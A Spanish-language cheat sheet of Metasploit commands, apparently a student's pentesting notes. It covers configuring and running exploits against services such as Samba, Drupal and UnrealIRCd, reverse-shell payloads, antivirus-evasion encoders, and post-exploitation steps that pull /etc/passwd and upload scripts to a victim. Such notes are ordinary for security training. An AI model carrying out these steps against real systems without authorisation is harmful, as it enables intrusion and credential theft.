COMANDOS METASPLOIT
msfdb | Muestra los parámetros que podemos utilizar |
msfdb init | Primero inicializamos la base de datos en modo root sudo su |
msfdb status | Para saber que la base de datos esta inicializada |
msfconsole |
Para ejecutar el framework. Exploits: es un programa o una secuencia de comandos que se aprovecha de un error para provocar un fallo en el sistema. Se utiliza para explotación de las vulnerabilidades que vayamos encontrando. Auxiliary: se utiliza para actividades que ayuden a detectar como vulnerar una máquina, (realizar reconocimiento, DOS Post: se utiliza para los equipos que ya tenemos acceso Payloads: “Carga útil” Nos ayuda a crear aplicaciones con una carga maliciosa “virus” nos ayuda para obtener acceso remoto a un sistema Encoders: “módulo de codificación” nos ayuda a ocultar los pailots que creemos, para que no sea reconocida por los antivirus. Nops: Sirve para ejecutar los payloads de manera eficiente evitado que se detenga el proceso Evasion: Nos ayuda a evadir la detección de un antivirus o sistema de seguridad |
help | Ver los comandos que podemos ejecutar |
search samba | Buscar un servicio específico. Check quiere decir si es vulnerable o no |
search samba type:exploit | Que nos muestre solo exploits |
info (número que nos muestra en pantalla) 15 | Para ver la información de los exploits |
Search payload/windows | Búsquedas de la plataforma o el módulo. Ejemplo: Muestra payloads |
EXPLOTAR VULNERABILIDADES (SERVICIOS)
service nessusd start | Desde el modo root, iniciamos el servicio de nessus |
msfdb run | Inicia metasploit |
search (pegamos el contenido copiado) | pegamos lo que hemos copiado en Nessus, es donde pone que puede ser vulnerabilidad por metasploit |
use (numero de la lista) | usar el script que le indicamos en el numero |
show options | Ver todos los parámetros que cuenta el exploid |
set RHOST (IP) | Modificar un valor |
set RPORT_FTP (Numero de puerto) | Modifica el puerto |
Set SITEPATH /var/www/html | Modificar la ruta del sitio |
show payloads | Mostrar payloads, para poder utilizar uno |
set payload (“ruta o nombre”name”) | Seleccionamos un payloads, conexión del maquina objetivo a nuestra máquina. Ejemplo el reverse TCP (vía Perl) |
LHOST | Ponemos nuestra IP de nuestra máquina. LOCALHOST |
LPORT | Maquina objetivo. LOCALPORT |
set LHOST (nuestra ip) | Para darle un valor a LHOST |
info | Para ver si es compatible con esta funcionalidad. Check supported: YES |
check | Para verificarlo |
exploit | Para ejecutar el exploit |
set TARGETURI /drupal/ | Modifica el TARGETURI (/drupal/ esto es la ruta que hemos buscado desde la ip de la maquina victima en el buscador Firefox) |
searchsploit UnrealIRCd | Busca información del sercicio , esto se hace fuera de metasploid |
search UnrealIRCd | Buscar vulnerabilidad |
set payload (nombre del payload o número) | Con el Bind TCP somos nosotros quien iniciamos las comunicaciones.El reverse tiene mas posibilidades de exito |
sessions -h | Ver las opciones que tenemos con este comando |
sessions | Lista las sesiones que tenemos abiertas, también se puede poner sessions -l |
session -i (numero de ID) | Para tener acceso a una de las sesiones |
session -i (numero de ID) -n (nombre que le queremos dar) | Para tener acceso a una de las sesiones y cambiarle el nombre |
POST EXPLOTACION
search Shell to meterpreter type:post | Transforma una Shell en meterprete. solo lo busca en el módulo post |
set SESION 3 | Ponemos la sesión de UNREAL que es la 3(esto lo editamos con el comando sesión -i 3 UNRE…) |
sessions -i 4 -n meterpreteUnreal | Ha creado una nueva sesión y vamos a renombrar |
sysinfo | Ver el sistema en el que estamos, ip, SO.. |
getuid | Ver el usuario en el que estamos (Get user ID) |
search type:post local exploit | Buscar vulnerabilidades locales post-explotacion. Desde metasploid |
run (nombre de la ruta copiada) | Ejecutar el script que hemos buscado antes que contiene las palabras locales Exploit. El resultado muestra los scripts que podemos explotar (los verdes) Copiamos la vulnerabilidad para luego utilizarla |
use (nombre de la ruta vulnerable a privilegios) | Entrar dentro de la vulnerabilidad |
set sesión 4 | Asignar el número de sesión |
getpid | Numero de proceso en el que estamos |
ps | Ver los procesos que se están ejecutando actualmente |
pgrep -h | Nos permite buscar según la cadena de caracteres que usemos. Ver las funcionalidadesque hace este comando |
pgrep -f -l pkexec | Muestra el nombre del proceso y el ID |
search -f *passwd | Buscar todo lo que contenga al final la palabra passwd |
download -h | Descargar el contenido. Esté muestra las opciones que puede hacer |
download /etc/ passwd UserLinux | Descarga dentro de la carpeta UserLinux (si no existe crea una automáticamente) |
upload -h | Subir un archivo a la maquina victima |
upload bash.sh (ruta si fuera necesario) | Sube el archivo bash.sh |
sh bash.sh | Primero tenemos que entrar en Shell y luego ejecutar el script que has subido poniendo sh bash.sh |